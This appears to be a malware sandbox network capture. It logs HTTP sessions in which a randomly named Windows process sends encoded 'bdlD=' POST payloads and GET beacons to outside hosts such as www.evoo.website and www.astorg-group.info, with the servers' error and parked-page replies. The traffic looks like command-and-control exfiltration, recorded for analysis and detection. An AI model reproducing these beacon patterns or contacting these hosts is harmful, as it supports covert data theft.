                                                                                                                                Data Ascii: bdlD=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFqd82H35XJJUV9B7BH+HJM+jZ6h1YwbVLg1FXeMyEBI4Q==


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                19192.168.2.650005128.65.195.180801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:54.973051071 CET1674OUTPOST /293d/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.evoo.website
                                                                                                                                Origin: http://www.evoo.website
                                                                                                                                Referer: http://www.evoo.website/293d/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 57 42 33 4e 4a 6f 6c 6a 6c 4e 44 41 59 78 71 37 6e 53 7a 63 34 73 59 42 65 70 50 38 4a 76 4c 78 44 34 56 48 33 30 64 38 57 78 4f 71 59 31 6a 62 44 73 55 78 71 59 62 4a 6b 42 53 69 38 44 44 5a 79 4a 6c 33 78 71 67 41 75 50 34 31 54 46 70 73 49 59 6c 69 49 79 30 46 6f 75 37 73 51 62 45 7a 73 44 34 50 46 4d 72 42 42 41 5a 51 61 42 6d 4d 4f 39 4f 54 4e 39 75 76 67 6d 55 54 58 48 30 4a 6d 52 66 38 34 36 47 68 70 67 47 33 36 36 2f 31 33 69 39 67 45 33 61 6e 68 4a 72 33 54 7a 42 4a 59 71 6e 2f 75 61 7a 59 46 69 54 37 52 65 4e 77 7a 4e 32 30 46 43 67 53 4e 33 2f 4a 47 76 35 53 62 4e 48 33 71 6a 44 4a 2b 53 6e 44 78 72 46 71 6c 67 72 4a 48 34 4b 36 61 45 62 4e 6e 61 6d 4d 33 6f 30 51 72 50 6c 6d 46 70 42 65 79 32 75 33 45 31 77 38 53 56 66 74 71 51 58 33 61 79 41 6c 31 50 6f 56 77 57 51 4b 36 5a 39 58 42 63 71 48 4f 69 6b 66 70 46 4e 4c 50 6e 54 35 67 4f 43 78 48 4d 34 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCWB3NJoljlNDAYxq7nSzc4sYBepP8JvLxD4VH30d8WxOqY1jbDsUxqYbJkBSi8DDZyJl3xqgAuP41TFpsIYliIy0Fou7sQbEzsD4PFMrBBAZQaBmMO9OTN9uvgmUTXH0JmRf846GhpgG366/13i9gE3anhJr3TzBJYqn/uazYFiT7ReNwzN20FCgSN3/JGv5SbNH3qjDJ+SnDxrFqlgrJH4K6aEbNnamM3o0QrPlmFpBey2u3E1w8SVftqQX3ayAl1PoVwWQK6Z9XBcqHOikfpFNLPnT5gOCxHM4ja4NUfqEtq43W4GxbxPRJ1cO+kjxB/DT1O9qzAPm4MfbGoUXyDQ8AZeXoQOiCn+yuaXPn4y+vRkjvuM5Lky3E+NN3+F0Gm7vChX9jEgq3Bm9gF2Ek+qcfnADXNjXi1CpxlE8W4clcJ5S16fKXcinaHandVrWTagJzdwjeqFypiCVCxuVfPrLIpT7BUm/uZRUrVEASemXmru9ZYF6RWx+mAISG0+BN/dX1r4ISylu5zkNjpGgv80YqxBC4yAqaqb7gON+2Qs6Uk4rzxq7EUjpBNj8CfIjKU79gxTFwy94S2qsDQxf8KZcC13hunFvRsKDVqgRPxvVnMdGHM+UwLk5NE6kEPK4dZbPXmEB6JxyeCn7XkstsxP56d1iOwrvvJD04CkofHl+YxxWCewCtVYShEPYCbPMF5GDtL5zOEv9vnZ4WiIVXUzR66q5BVkyyYbf2Ryw4L0DOCBGWg39POD3uQvoWgRai8yfozoJXAAPwyrdGPIWcJCOkAx+7+RRwigq77VTdke5JJryryE0EEX1dVo36wh56yuzwivnW8Uftwk54IBOQMEwtDU0RX122GhECgr4FbLArOWkMEDx+4Fztb3AwOohk4dwy2JNJ8uGScWj1dPHGKNJX3fLxwO1/C7GptOxmHubytjairBnvx3rvKliqS32pKffc3 [TRUNCATED]


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                20192.168.2.650006128.65.195.180801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:57.513317108 CET388OUTGET /293d/?92=DPyPNvf84fs0yXSp&bdlD=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQfJK7OXgC3z9Q8k+eyxfCNOxpUJEtAyvn1uDuMR9mQoL/1sf57M= HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.evoo.website
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:26:59.802262068 CET458INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:26:59 GMT
                                                                                                                                Server: Apache/2.4.25 (Debian)
                                                                                                                                Content-Length: 278
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                21192.168.2.650007217.70.184.50801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:05.050431013 CET652OUTPOST /vdvc/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.astorg-group.info
                                                                                                                                Origin: http://www.astorg-group.info
                                                                                                                                Referer: http://www.astorg-group.info/vdvc/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 46 38 66 61 4d 5a 69 54 77 76 6e 59 51 53 2f 61 7a 72 6c 46 4f 7a 70 50 67 71 31 73 5a 2b 4c 7a 43 67 63 46 2f 63 6c 4b 53 58 70 4c 37 4d 69 48 4f 36 51 32 77 63 32 4b 62 65 73 44 63 64 57 6c 39 64 4d 6c 69 75 4b 4b 52 50 64 71 58 4a 45 57 44 64 63 51 62 79 56 69 59 41 2b 42 44 4a 6c 4c 46 35 61 4f 6e 67 78 35 4a 4c 4c 69 72 65 64 75 2f 4f 30 54 51 48 41 33 6e 67 73 73 47 7a 2f 43 44 64 79 54 71 52 6c 35 35 45 4f 56 75 67 5a 68 70 41 79 6e 75 58 47 48 6a 44 67 58 41 69 63 4d 66 71 76 35 34 52 73 5a 78 69 42 50 71 6f 59 75 78 4b 6e 39 58 4f 33 6b 2f 69 6a 5a 43 6a 6c 49
                                                                                                                                Data Ascii: bdlD=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynuXGHjDgXAicMfqv54RsZxiBPqoYuxKn9XO3k/ijZCjlI
                                                                                                                                Nov 18, 2024 16:27:05.856203079 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:05 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                22192.168.2.650008217.70.184.50801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:07.600482941 CET676OUTPOST /vdvc/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.astorg-group.info
                                                                                                                                Origin: http://www.astorg-group.info
                                                                                                                                Referer: http://www.astorg-group.info/vdvc/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 49 7a 7a 4d 68 73 46 77 35 4a 4b 52 58 70 4c 6a 63 69 43 54 4b 51 6f 77 63 36 34 62 61 6b 44 63 5a 32 6c 39 59 77 6c 6a 5a 2b 4c 52 66 64 53 4d 5a 46 77 64 74 63 51 62 79 56 69 59 41 36 37 44 4a 39 4c 45 4a 4b 4f 6d 43 5a 36 45 72 4c 6a 73 65 64 75 79 75 30 58 51 48 41 46 6e 68 41 47 47 78 33 43 44 59 57 54 72 44 4e 36 77 45 4f 54 68 41 59 71 34 51 62 39 6a 56 54 32 70 56 34 59 42 79 59 73 61 63 79 6a 6b 69 73 36 6a 79 68 4e 71 71 41 63 78 71 6e 58 56 4f 50 6b 74 31 76 2b 4e 58 41 72 57 49 6a 71 73 42 70 79 4b 6a 55 77 70 47 64 43 35 32 37 49 41 51 3d 3d
                                                                                                                                Data Ascii: bdlD=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jyhNqqAcxqnXVOPkt1v+NXArWIjqsBpyKjUwpGdC527IAQ==
                                                                                                                                Nov 18, 2024 16:27:08.412798882 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:08 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                23192.168.2.650009217.70.184.50801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:10.146294117 CET1689OUTPOST /vdvc/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.astorg-group.info
                                                                                                                                Origin: http://www.astorg-group.info
                                                                                                                                Referer: http://www.astorg-group.info/vdvc/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 4c 54 7a 4d 53 30 46 78 61 78 4b 51 58 70 4c 39 4d 69 44 54 4b 52 30 77 59 57 38 62 61 6f 54 63 66 36 6c 39 2b 6b 6c 79 63 53 4c 66 66 64 53 54 4a 46 6b 44 64 63 4a 62 30 31 63 59 41 71 37 44 4a 39 4c 45 50 4f 4f 79 67 78 36 43 72 4c 69 72 65 64 55 2f 4f 30 76 51 45 78 79 6e 68 30 38 47 41 58 43 43 34 47 54 70 32 35 36 2f 45 4f 52 6b 41 5a 71 34 51 47 6a 6a 56 66 74 70 56 6c 33 42 31 51 73 59 72 6a 6b 2f 6a 59 43 67 67 42 66 38 38 55 56 6f 73 76 2f 58 6f 7a 44 6d 6a 33 58 47 30 59 59 64 73 76 68 36 43 41 4e 50 46 38 2b 6e 44 74 51 37 45 6a 4e 51 48 64 54 43 78 70 41 47 4b 6c 48 63 4f 51 34 51 6c 51 6c 33 57 46 44 48 49 6f 42 33 57 6c 4c 74 61 36 53 33 34 73 4e 4a 6c 48 74 33 78 5a 6a 34 4c 45 41 50 6a 76 66 77 63 6e 52 35 63 6a 39 72 69 53 77 43 31 57 5a 4a 42 6d 61 37 48 44 51 36 50 35 48 4b 4a 48 51 43 47 49 41 67 36 6b 6a 59 74 64 52 47 52 36 59 6f 44 30 6c 31 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZLTzMS0FxaxKQXpL9MiDTKR0wYW8baoTcf6l9+klycSLffdSTJFkDdcJb01cYAq7DJ9LEPOOygx6CrLiredU/O0vQExynh08GAXCC4GTp256/EORkAZq4QGjjVftpVl3B1QsYrjk/jYCggBf88UVosv/XozDmj3XG0YYdsvh6CANPF8+nDtQ7EjNQHdTCxpAGKlHcOQ4QlQl3WFDHIoB3WlLta6S34sNJlHt3xZj4LEAPjvfwcnR5cj9riSwC1WZJBma7HDQ6P5HKJHQCGIAg6kjYtdRGR6YoD0l1MSCKvaE3KO/ZSOqje3qr+gamqGv9URJTrIeto19UlgDmTnawDlWyMj7OngYr5RyXFZrWRUY/Wb1w3ir0Z4V9AeR9rXn9EQpmYxXuEhaLiks3OG43h1kBXmWilL8rsotRI+1NjGymXsM1ZQSe6bqsJQ6rPjUCLn7RO2sMwtR1H5qC0hjMCZyUgbtR8miBqkjvdYthdd+qnspyptDq/KRHOO3PCGcGow6dD4N7U/VStfYuozExH2n4GPUP99UMLgE7/asQmmV7b/1sagMdFnpHLSUCQ3Wqk2ep+7WwSr9zz/t2G3mpWhasbyLKBqG2St15Ep9OpO0jXRT5M6X9dMBTcjYlzIYwip1wBGGhJIuTxvSXrEYtPtto2TQ5vTu2RJi+oZeXAh1iIp3QvV5MCW9HvULn3XVEjl9uk2RMG7lGYKv3fHrGO38eZBlUSwuIe+eDcfM4W7a6Hxr8AytWRK57wJD1x0T/vY1pheRl56pTg1+ZtusvIJSqW8r6HnsoliXniXGzOWJIqI008F5oROSi2tusiqSWVX6OSBZmkYZjY3ErWgqBAXkl0x5tCxQENeccsMSQz5c1Ahrxz8UTNEW/cNT/vSN4DVpAHAFzqztjGRJaWix41vcdxoUDPxB4MbuDArWRiQTrU4QcY5ZuBFbgJsrw+GfXQipH7s [TRUNCATED]
                                                                                                                                Nov 18, 2024 16:27:10.955631971 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:10 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                24192.168.2.650011217.70.184.50801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:12.724095106 CET393OUTGET /vdvc/?bdlD=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfKoDXMQfKdBjdSZSECOlFudRAOmJhTFjNLDsmq1e7cQhZ206lWU=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.astorg-group.info
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:27:13.519913912 CET1236INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:13 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                Content-Security-Policy: default-src 'self'; script-src 'nonce-77448e08b46b4a848da3ce88feca6b5a';
                                                                                                                                Vary: Accept-Language
                                                                                                                                Data Raw: 39 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 37 37 34 34 38 65 30 38 62 34 36 62 34 61 38 34 38 64 61 33 63 65 38 38 66 65 63 61 36 62 35 61 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                Data Ascii: 93a<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-77448e08b46b4a848da3ce88feca6b5a';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>astorg-group.info</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article
                                                                                                                                Nov 18, 2024 16:27:13.519984961 CET212INData Raw: 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d
                                                                                                                                Data Ascii: class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https:/
